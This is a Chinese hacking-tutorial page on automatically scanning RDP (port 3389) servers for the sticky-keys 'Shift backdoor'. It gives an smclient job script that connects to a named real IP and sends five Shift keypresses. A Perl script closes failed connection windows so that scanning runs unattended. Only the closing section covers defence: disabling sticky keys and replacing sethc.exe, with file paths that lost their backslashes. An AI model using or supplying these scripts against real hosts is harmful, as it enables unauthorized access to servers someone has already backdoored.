3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]
3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]
发布时间:2016-12-21 来源:查字典编辑
摘要:首先3389的SHIFT后门极少其次大部分SHIFT后门都加密所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受需要用到的工具ro...

首先3389的SHIFT后门极少

其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受

需要用到的工具 roboclient

smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

shift_backdoor.txt:

job

{

connect("","","",1,1);

sleep(2000);

senddata("WM_KEYDOWN",16,2752513);

senddata("WM_KEYUP",16,3223977985);

senddata("WM_KEYDOWN",16,2752513);

senddata("WM_KEYUP",16,3223977985);

senddata("WM_KEYDOWN",16,2752513);

senddata("WM_KEYUP",16,3223977985);

senddata("WM_KEYDOWN",16,2752513);

senddata("WM_KEYUP",16,3223977985);

senddata("WM_KEYDOWN",16,2752513);

senddata("WM_KEYUP",16,3223977985);

sleep(2000);

disconnect();

}

有些SHIFT后门被改成了按7次SHIFT,或者是WIN+U后门,改改shift_backdoor.txt把功能加进去即可

自动关闭错误连接

复制代码代码如下:

#!/usr/bin/perl

use warnings;

use Win32::GUI;

use constant WM_CLOSE => 16;

sub monitor {

my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');

Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);

}

sub monitor1 {

my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话');

Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);

}

while(1){

&monitor;

&monitor1;

sleep(2);

}

shift后门的解决办法

一日在网上看到了shift后门,说是按5下shift键服务器的系统盘就蹦出来了,不用输入密码!我一看,就怀着好奇的想法试了下果真如此,难怪我们的服务器总是出问题,查了下解决办法现在发出来,希望和我一样的菜鸟X级网管能有用。

打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾

还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问

shift后门的预防解决办法:预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键

已经中了的话

attrib c:windowssystem32sethc.exe -h

attrib c:windowssystem32dllcachesethc.exe -h

拷贝新的 c:windowssystem32sethc.exe 文件到 c:windowssystem32目录下;拷贝新的c:windowssystem32dllcachesethc.exe到c:windowssystem32dllcache目录下

收工!

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新黑客教程学习
热门黑客教程学习
网络安全子分类